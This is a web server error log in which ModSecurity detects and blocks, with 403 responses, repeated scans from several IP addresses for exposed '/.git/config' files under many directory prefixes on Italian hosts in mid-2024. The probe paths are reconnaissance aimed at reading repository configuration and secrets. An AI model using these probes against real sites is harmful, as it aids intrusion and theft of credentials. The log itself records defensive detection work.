[Fri Jun 14 20:21:00.968710 2024] [:error] [pid 3931345] [client 83.147.52.49:34320] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZmyKDN3BhLISMF1Hhn5JRAAAAAM"]
[Fri Jun 14 20:21:00.970365 2024] [:error] [pid 3931345] [client 83.147.52.49:34320] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZmyKDN3BhLISMF1Hhn5JRAAAAAM"]
[Fri Jun 14 20:21:00.970814 2024] [:error] [pid 3931345] [client 83.147.52.49:34320] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZmyKDN3BhLISMF1Hhn5JRAAAAAM"]
[Tue Jun 18 07:47:23.980890 2024] [:error] [pid 4020490] [client 179.43.188.122:53292] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZnEfawmG0pf-TnB695M-yQAAAAU"]
[Tue Jun 18 07:47:23.982603 2024] [:error] [pid 4020490] [client 179.43.188.122:53292] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZnEfawmG0pf-TnB695M-yQAAAAU"]
[Tue Jun 18 07:47:23.983008 2024] [:error] [pid 4020490] [client 179.43.188.122:53292] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZnEfawmG0pf-TnB695M-yQAAAAU"]
[Tue Jun 18 07:47:24.002208 2024] [:error] [pid 4020489] [client 179.43.188.122:53300] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZnEfa4UC0vWwlNWVQEX28QAAAAQ"]
[Tue Jun 18 07:47:24.002844 2024] [:error] [pid 4020489] [client 179.43.188.122:53300] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZnEfa4UC0vWwlNWVQEX28QAAAAQ"]
[Tue Jun 18 07:47:24.003286 2024] [:error] [pid 4020489] [client 179.43.188.122:53300] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZnEfa4UC0vWwlNWVQEX28QAAAAQ"]
[Tue Jul 02 10:16:17.295090 2024] [:error] [pid 153447] [client 185.196.9.227:54498] [client 185.196.9.227] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZoO3UQYbkIQrbiLk8B0IfwAAAAA"]
[Tue Jul 02 10:16:17.297008 2024] [:error] [pid 153447] [client 185.196.9.227:54498] [client 185.196.9.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZoO3UQYbkIQrbiLk8B0IfwAAAAA"]
[Tue Jul 02 10:16:17.297396 2024] [:error] [pid 153447] [client 185.196.9.227:54498] [client 185.196.9.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZoO3UQYbkIQrbiLk8B0IfwAAAAA"]
[Sun Jul 07 03:38:11.713676 2024] [authz_core:error] [pid 263880] [client 83.147.52.49:43392] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Sun Jul 07 03:38:11.713814 2024] [:error] [pid 263879] [client 83.147.52.49:43360] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /admin/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "ZonxgwV9onmuO0oxibIM2gAAAAI"]
[Sun Jul 07 03:38:11.716408 2024] [:error] [pid 263881] [client 83.147.52.49:43408] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /s3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/s3/.git/config"] [unique_id "Zonxg8GCFK9BzeBtBpHL9wAAAAQ"]
[Sun Jul 07 03:38:11.716595 2024] [:error] [pid 263877] [client 83.147.52.49:43344] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /web/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.git/config"] [unique_id "Zonxg8cBKsw7eUtn1AYU9wAAAAA"]
[Sun Jul 07 03:38:11.716825 2024] [:error] [pid 263881] [client 83.147.52.49:43408] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/s3/.git/config"] [unique_id "Zonxg8GCFK9BzeBtBpHL9wAAAAQ"]
[Sun Jul 07 03:38:11.717038 2024] [:error] [pid 263881] [client 83.147.52.49:43408] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/s3/.git/config"] [unique_id "Zonxg8GCFK9BzeBtBpHL9wAAAAQ"]
[Sun Jul 07 03:38:11.717048 2024] [:error] [pid 263877] [client 83.147.52.49:43344] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.git/config"] [unique_id "Zonxg8cBKsw7eUtn1AYU9wAAAAA"]
[Sun Jul 07 03:38:11.717476 2024] [:error] [pid 263877] [client 83.147.52.49:43344] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.git/config"] [unique_id "Zonxg8cBKsw7eUtn1AYU9wAAAAA"]
[Sun Jul 07 03:38:11.718358 2024] [authz_core:error] [pid 264361] [client 83.147.52.49:43520] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.git
[Sun Jul 07 03:38:11.719240 2024] [:error] [pid 263879] [client 83.147.52.49:43360] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "ZonxgwV9onmuO0oxibIM2gAAAAI"]
[Sun Jul 07 03:38:11.719444 2024] [:error] [pid 263879] [client 83.147.52.49:43360] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.git/config"] [unique_id "ZonxgwV9onmuO0oxibIM2gAAAAI"]
[Sun Jul 07 03:38:11.720853 2024] [authz_core:error] [pid 263878] [client 83.147.52.49:43426] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/.git
[Sun Jul 07 03:38:11.721234 2024] [:error] [pid 263882] [client 83.147.52.49:43424] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /assets/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.git/config"] [unique_id "Zonxg1OeDUJXHqhWEUNgQAAAAAU"]
[Sun Jul 07 03:38:11.721495 2024] [:error] [pid 263882] [client 83.147.52.49:43424] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.git/config"] [unique_id "Zonxg1OeDUJXHqhWEUNgQAAAAAU"]
[Sun Jul 07 03:38:11.721724 2024] [:error] [pid 263882] [client 83.147.52.49:43424] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.git/config"] [unique_id "Zonxg1OeDUJXHqhWEUNgQAAAAAU"]
[Sun Jul 07 03:38:11.815097 2024] [:error] [pid 263880] [client 83.147.52.49:43392] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "Zonxg3EdEdtlNTcad-lqgQAAAAM"]
[Sun Jul 07 03:38:11.815635 2024] [:error] [pid 263880] [client 83.147.52.49:43392] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "Zonxg3EdEdtlNTcad-lqgQAAAAM"]
[Sun Jul 07 03:38:11.816074 2024] [:error] [pid 263880] [client 83.147.52.49:43392] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "Zonxg3EdEdtlNTcad-lqgQAAAAM"]
[Sun Jul 07 03:38:11.817127 2024] [:error] [pid 263881] [client 83.147.52.49:43408] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /www/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "Zonxg8GCFK9BzeBtBpHL-AAAAAQ"]
[Sun Jul 07 03:38:11.817533 2024] [:error] [pid 263881] [client 83.147.52.49:43408] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "Zonxg8GCFK9BzeBtBpHL-AAAAAQ"]
[Sun Jul 07 03:38:11.817901 2024] [:error] [pid 263881] [client 83.147.52.49:43408] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "Zonxg8GCFK9BzeBtBpHL-AAAAAQ"]
[Sun Jul 07 03:38:11.820370 2024] [:error] [pid 263877] [client 83.147.52.49:43344] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /htdocs/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/htdocs/.git/config"] [unique_id "Zonxg8cBKsw7eUtn1AYU-AAAAAA"]
[Sun Jul 07 03:38:11.820765 2024] [:error] [pid 263877] [client 83.147.52.49:43344] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/htdocs/.git/config"] [unique_id "Zonxg8cBKsw7eUtn1AYU-AAAAAA"]
[Sun Jul 07 03:38:11.821096 2024] [:error] [pid 263877] [client 83.147.52.49:43344] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/htdocs/.git/config"] [unique_id "Zonxg8cBKsw7eUtn1AYU-AAAAAA"]
[Sun Jul 07 03:38:11.821593 2024] [:error] [pid 264361] [client 83.147.52.49:43520] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /home/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/home/.git/config"] [unique_id "Zonxg6hJN3w1yQAx8ZjcqgAAAAY"]
[Sun Jul 07 03:38:11.822021 2024] [:error] [pid 264361] [client 83.147.52.49:43520] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/home/.git/config"] [unique_id "Zonxg6hJN3w1yQAx8ZjcqgAAAAY"]
[Sun Jul 07 03:38:11.822502 2024] [:error] [pid 264361] [client 83.147.52.49:43520] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/home/.git/config"] [unique_id "Zonxg6hJN3w1yQAx8ZjcqgAAAAY"]
[Sun Jul 07 03:38:11.823036 2024] [:error] [pid 263879] [client 83.147.52.49:43360] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /http/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/http/.git/config"] [unique_id "ZonxgwV9onmuO0oxibIM2wAAAAI"]
[Sun Jul 07 03:38:11.823406 2024] [:error] [pid 263879] [client 83.147.52.49:43360] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/http/.git/config"] [unique_id "ZonxgwV9onmuO0oxibIM2wAAAAI"]
[Sun Jul 07 03:38:11.823584 2024] [:error] [pid 263879] [client 83.147.52.49:43360] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/http/.git/config"] [unique_id "ZonxgwV9onmuO0oxibIM2wAAAAI"]
[Sun Jul 07 03:38:11.823628 2024] [authz_core:error] [pid 263878] [client 83.147.52.49:43426] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.git
